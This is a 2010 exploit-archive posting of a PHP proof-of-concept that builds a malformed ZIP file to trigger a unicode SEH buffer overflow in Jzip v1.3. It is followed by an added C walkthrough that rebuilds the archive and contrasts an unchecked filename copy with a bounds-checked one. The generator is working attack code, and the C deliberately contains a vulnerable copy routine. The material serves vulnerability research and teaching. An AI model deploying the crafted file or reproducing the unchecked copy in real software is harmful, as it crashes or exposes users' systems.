
Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC

Posted on 06 April 2010

=================================================
Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC
=================================================

<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC
Date: 6/4/2010
Author: mr_me (http://net-ninja.net/)
Software Link: http://www.jzip.com/
Version: 1.3
Tested on: Windows XP SP3 En
Advisory: http://www.corelan.be:8800/advisories.php?id=10-021
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: jzip.exe and all associated modules are compiled with safeseh, and
combining that with the unicode limitation proves very difficult for
exploitation. We did not find a working unicode address, otherwise this
vulnerability would have been a lot more fun! The seven moons were not
aligned as Ben puts it :)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
*/

// 30-byte local file header (PK\x03\x04): version 2.0, method "stored", CRC and sizes zero
$lf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
             "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00";

// 46-byte central directory entry (PK\x01\x02): filename length 0x0fe4 = 4068 at offset 28,
// external attributes 0x24, local header offset 0
$cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00".
              "\x24\x00\x00\x00\x00\x00\x00\x00";

// 22-byte end of central directory record (PK\x05\x06): one entry,
// central directory size 0x1012 = 46 + 4068, central directory offset 0x1002 = 30 + 4068
$efcdr_record = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
                "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";

// filename: 810 bytes of padding, then the nSEH/SEH markers, 'A' padding up to 4064 bytes, then ".txt"
$___offset = 4064;
$___nseh = str_repeat("\x43",2);
$___seh = str_repeat("\x44",2);
$___exploit = str_repeat("\x41",810).
              $___nseh.
              $___seh;
$___exploit .= str_repeat("\x41",$___offset-strlen($___exploit)).
               "\x2e\x74\x78\x74";

// the same 4068-byte name is used in both the local header and the central directory entry
$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record;
file_put_contents("cst-jzip.zip",$_____b00m);
?>

# Inj3ct0r.com [2010-04-06]
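Added here as a worked example, not code from the PoC above or from the jzip project: the C below rebuilds the same three ZIP records the PHP emits (local file header, central directory entry, end-of-central-directory record, with the 4068-byte name carrying the nSEH/SEH markers at byte 810), walks them the way an archiver does to reach the attacker-controlled filename length, and contrasts an unchecked ANSI-to-UTF-16 filename copy, the bug class a "unicode overflow" comes from, with a bounds-checked one. The byte-to-UTF-16 loop is a stand-in for MultiByteToWideChar, and the 260-unit destination is a hypothetical MAX_PATH buffer; the PoC does not identify jzip's actual sink, so that part is illustrative. The sizes and offsets (4068, 0x1002, 0x1012, marker at 810) are taken from the PoC; time, date and CRC fields are left zero rather than copied byte for byte.

```c
/* Added example, not part of the PoC: rebuild the PoC's ZIP layout, parse it,
 * and show the unchecked vs checked ANSI->UTF-16 filename copy.
 * Assumptions: the widening loop stands in for MultiByteToWideChar and the
 * 260-unit buffer is a hypothetical MAX_PATH sink, not jzip's real one. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN   4068   /* 4064 payload bytes + ".txt", as in $___exploit */
#define LFH_LEN    30
#define CDFH_LEN   46
#define EOCD_LEN   22
#define POC_LEN    (LFH_LEN + NAME_LEN + CDFH_LEN + NAME_LEN + EOCD_LEN)  /* 8234 */
#define MAX_PATH_W 260    /* hypothetical fixed wchar_t buffer size */

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get32(const uint8_t *p) { return get16(p) | ((uint32_t)get16(p + 2) << 16); }

/* Same filename the PHP builds: 810 x 'A', "CC" (nSEH), "DD" (SEH), 'A' padding, ".txt". */
static void build_name(uint8_t *name) {
    memset(name, 'A', NAME_LEN - 4);
    name[810] = 'C'; name[811] = 'C';      /* lands on the next-SEH pointer after widening */
    name[812] = 'D'; name[813] = 'D';      /* lands on the SEH handler pointer */
    memcpy(name + NAME_LEN - 4, ".txt", 4);
}

/* LFH + name + CDFH + name + EOCD, laid out like the PoC (time/date/CRC left zero). */
size_t build_poc_zip(uint8_t *out) {
    uint8_t *p = out;
    memset(out, 0, POC_LEN);
    memcpy(p, "PK\x03\x04", 4); put16(p + 4, 0x14); put16(p + 26, NAME_LEN); p += LFH_LEN;
    build_name(p); p += NAME_LEN;
    memcpy(p, "PK\x01\x02", 4); put16(p + 4, 0x14); put16(p + 6, 0x14);
    put16(p + 28, NAME_LEN); put16(p + 36, 1); put32(p + 38, 0x24); p += CDFH_LEN;
    build_name(p); p += NAME_LEN;
    memcpy(p, "PK\x05\x06", 4); put16(p + 8, 1); put16(p + 10, 1);
    put32(p + 12, CDFH_LEN + NAME_LEN);    /* 0x1012: central directory size   */
    put32(p + 16, LFH_LEN + NAME_LEN);     /* 0x1002: central directory offset */
    return (size_t)(p + EOCD_LEN - out);
}

/* Follow EOCD -> central directory -> first entry and return its filename length,
 * the attacker-controlled field that sizes the copy. Returns 0 on any structural failure. */
uint16_t first_entry_name_len(const uint8_t *zip, size_t len, uint32_t *cd_off_out) {
    if (len < EOCD_LEN) return 0;
    const uint8_t *eocd = zip + len - EOCD_LEN;   /* the PoC carries no archive comment */
    if (memcmp(eocd, "PK\x05\x06", 4) != 0) return 0;
    uint32_t cd_size = get32(eocd + 12), cd_off = get32(eocd + 16);
    if (cd_off > len || cd_size > len - cd_off || cd_size < CDFH_LEN) return 0;
    if (memcmp(zip + cd_off, "PK\x01\x02", 4) != 0) return 0;
    if (cd_off_out) *cd_off_out = cd_off;
    return get16(zip + cd_off + 28);
}

/* The bug class: trust the length field and widen byte-by-byte into a fixed stack
 * buffer. Shown for the pattern only; never call it with the PoC name. */
void vulnerable_widen(const uint8_t *name, uint16_t len) {
    uint16_t wide[MAX_PATH_W];
    for (uint16_t i = 0; i < len; i++) wide[i] = name[i];   /* 4068 units into 260 slots */
    (void)wide;
}

/* Hardened form: refuse anything that will not fit with its terminator before
 * writing a single unit. Returns units written, or -1 when rejected. */
int checked_widen(const uint8_t *name, uint16_t len, uint16_t *wide, size_t cap) {
    if ((size_t)len >= cap) return -1;
    for (uint16_t i = 0; i < len; i++) wide[i] = name[i];   /* 0x41 -> 0x0041 */
    wide[len] = 0;
    return len;
}

/* Returns 0 when the rebuilt archive has the PoC's layout and the check rejects its name. */
int poc_self_check(void) {
    static uint8_t zip[POC_LEN];
    static uint16_t wide[NAME_LEN + 1];
    uint32_t cd_off = 0;
    if (build_poc_zip(zip) != 8234) return 1;
    uint16_t fnlen = first_entry_name_len(zip, POC_LEN, &cd_off);
    if (fnlen != 4068 || cd_off != 0x1002) return 2;
    if (checked_widen(zip + cd_off + CDFH_LEN, fnlen, wide, MAX_PATH_W) != -1) return 3;
    if (checked_widen(zip + cd_off + CDFH_LEN, fnlen, wide, NAME_LEN + 1) != 4068) return 4;
    /* after widening the markers sit at byte 1620 (unit 810): 00 43 00 43 00 44 00 44 */
    if (wide[810] != 0x0043 || wide[812] != 0x0044 || wide[4067] != 't') return 5;
    return 0;
}

int main(void) {
    printf("self check: %d (0 = layout and rejection as expected)\n", poc_self_check());
    return 0;
}
```

The widening is why the PoC is constrained to "unicode" addresses: every filename byte becomes a 16-bit unit of the form 00 xx, so the two marker bytes "DD" become 00 44 00 44 and an SEH handler can only be pointed at an address of the shape 0x00XX00YY, which is the limitation the author's note refers to.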
